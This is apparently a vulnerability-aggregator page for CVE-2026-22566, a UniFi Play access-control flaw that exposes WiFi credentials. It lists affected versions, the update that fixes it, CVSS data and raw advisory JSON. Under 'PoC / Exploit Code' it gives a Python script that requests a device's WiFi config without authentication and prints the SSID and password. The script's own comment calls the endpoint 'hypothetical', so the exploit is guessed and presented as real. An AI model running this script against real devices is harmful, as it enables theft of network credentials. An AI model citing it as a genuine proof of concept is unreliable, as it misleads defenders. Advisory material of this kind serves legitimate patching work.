Security Vulnerability Report
中文
CVE-2026-22566 CVSS 7.5 HIGH

CVE-2026-22566

Published: 2026-04-13 22:16:28
Last Modified: 2026-04-30 16:14:21
Source: [email protected]

Description

An Improper Access Control vulnerability could allow a malicious actor with access to the UniFi Play network to obtain UniFi Play WiFi credentials.
 Affected Products: UniFi Play PowerAmp (Version 1.0.35 and earlier)
 UniFi Play Audio Port  (Version 1.0.24 and earlier)
 Mitigation: Update UniFi Play PowerAmp to Version 1.0.38 or later
 Update UniFi Play Audio Port  to Version 1.1.9 or later

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

UniFi Play PowerAmp <= 1.0.35
UniFi Play Audio Port <= 1.0.24

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # PoC for CVE-2026-22566: Improper Access Control in UniFi Play # This script attempts to retrieve WiFi credentials without authentication. def exploit_unifi_play(target_ip): # Hypothetical vulnerable endpoint based on the vulnerability description # Attackers can access config data without auth due to improper access control url = f"http://{target_ip}/api/v1/network/wifi/config" headers = { "User-Agent": "Mozilla/5.0 (Compatible; CVE-2026-22566-Scanner)", "Accept": "application/json" } print(f"[*] Attempting to retrieve credentials from {target_ip}...") try: # Send request without authentication tokens response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: data = response.json() print("[+] Exploit Successful! Sensitive data retrieved:") print(json.dumps(data, indent=4)) # Extract specific fields if they exist if 'wifi_ssid' in data and 'wifi_password' in data: print(f"[+] SSID: {data['wifi_ssid']}") print(f"[+] Password: {data['wifi_password']}") else: print(f"[-] Request failed with status code: {response.status_code}") print(f"[-] The device might be patched or not vulnerable.") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") except json.JSONDecodeError: print("[-] Response was not valid JSON.") if __name__ == "__main__": # Replace with the actual IP address of the target device target = "192.168.1.100" exploit_unifi_play(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22566", "sourceIdentifier": "[email protected]", "published": "2026-04-13T22:16:28.437", "lastModified": "2026-04-30T16:14:21.333", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Access Control vulnerability could allow a malicious actor with access to the UniFi Play network to obtain UniFi Play WiFi credentials.
 \n\nAffected Products:\nUniFi Play PowerAmp (Version 1.0.35 and earlier)
\nUniFi Play Audio Port  (Version 1.0.24 and earlier)
 \n\nMitigation:\nUpdate UniFi Play PowerAmp to Version 1.0.38 or later
\nUpdate UniFi Play Audio Port  to Version 1.1.9 or later"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.